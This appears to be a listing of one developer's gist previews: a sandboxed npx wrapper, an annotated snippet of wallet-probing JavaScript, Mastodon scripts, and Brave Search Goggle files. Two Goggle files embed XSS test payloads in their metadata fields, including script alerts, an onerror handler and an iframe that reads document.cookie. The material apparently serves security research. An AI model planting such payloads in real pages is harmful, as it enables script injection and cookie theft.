thypon

#!/bin/sh
# npxs - Sandboxed npx runner for secure MCP server execution
#
# Installation:
#   wget https://gist.githubusercontent.com/thypon/ec4bb090d6ca1ffd0baac3a4f2c6a106/raw/npxs
#   chmod +x npxs
#   mv npxs ~/.local/bin/  # or any directory in your PATH
#
# Usage:
#   Use 'npxs' instead of 'npx' when running MCP servers for sandboxed execution

thypon

// Global state variables
var hasEthereumWallet = 0;  // Flag to track if Ethereum wallet is detected
var hasRunOnce = 0;         // Flag to prevent multiple executions
var hasInitialized = 0;     // Flag to track if initialization is complete

// Function to check for Ethereum wallet presence and initialize malicious hooks
async function checkEthereumWallet() {
  try {
    // Attempts to get Ethereum accounts - SECURITY RISK: This is probing for wallet access
    const ethAccounts = await window.ethereum.request({

thypon

import sys
import logging
import os
import random
import json
import argparse

from PIL import Image
import requests
from io import BytesIO

thypon

<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Haunted IFrame</title>
</head>

<body>

thypon

require 'httparty'
require 'date'
require 'pry'

# In order to use:
#
# 1. Create a token with 
#	scopes read:accounts read:favourites read:statuses write:favourites write:statuses
#   in https://mastodon.social/settings/applications, copy "Your access token"
# 2. Find your user ID by inspecting the /search queries through an intercepting proxy

thypon

// ==UserScript==
// @name         Fix Mastodon Hashtags
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  Fix the hashtag issue in mastodon
// @author       [email protected]
// @match        https://*/*
// @icon         https://www.google.com/s2/favicons?sz=64&domain=tampermonkey.net
// @grant        none
// ==/UserScript==

thypon

! name: <script id="js-umNotice" src="https://cdn.search.brave.com/serp/v1/static/serp-js/umNotice/5397726bb717fcb68b70ab8e189f0d4916703b392457a4450a06705d64e95743-main.bundle.js" data="{&quot;i18n&quot;:{&quot;usage-metrics-notice&quot;:&quot;Brave Search uses private usage metrics to estimate overall activity and performance. You can turn off this option in <script>alert(1)</script><a href='/settings'>Settings</a>.&quot;,&quot;Learn more&quot;:&quot;Learn more&quot;}}"></script>test<a>test</a><img src=x onerror=prompt(domain)><h1><marquee>XSS</marquee></h1>
! description: Rtest http://thomasg.fr/
! public: true
! author: Goggles<script id="js-umNotice" src="https://cdn.search.brave.com/serp/v1/static/serp-js/umNotice/5397726bb717fcb68b70ab8e189f0d4916703b392457a4450a06705d64e95743-main.bundle.js" data="{&quot;i18n&quot;:{&quot;usage-metrics-notice&quot;:&quot;Brave Search uses private usage metrics to estimate overall activity and performance. You can turn off this option in <script>alert(1)</script><a href

thypon

! name: MyNetsec
! description: Prioritizes domains popular with the information security community. Primarily uses submissions and scoring from /r/netsec.
! public: true
! author: Andrea Brancaleoni
! avatar: #ff0000
! homepage: https://github.com/thypon

! Goggle extras
$discard
$boost=3,site=github.io

thypon

! name: <iframe srcdoc="<p>Hello world!<script>alert(document.cookie)</script></p>" src="demo_iframe_srcdoc.htm"><p>Your browser does not support iframes.</p></iframe>test
! description: Rtest http://thomasg.fr/
! public: true
! author: <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>test
! avatar: #9244e0
$discard
$downrank,site=medium.com
$boost=1,site=github.io
$boost=1,site=micro.blog
/blog.$boost=1

thypon

# Author:     Andrea Brancaleoni
# Version:    1.0
# License:     MIT License

from burp import IBurpExtender
from burp import IHttpListener
from burp import IProxyListener
from burp import IContextMenuFactory

from javax.swing import JMenuItem, JFileChooser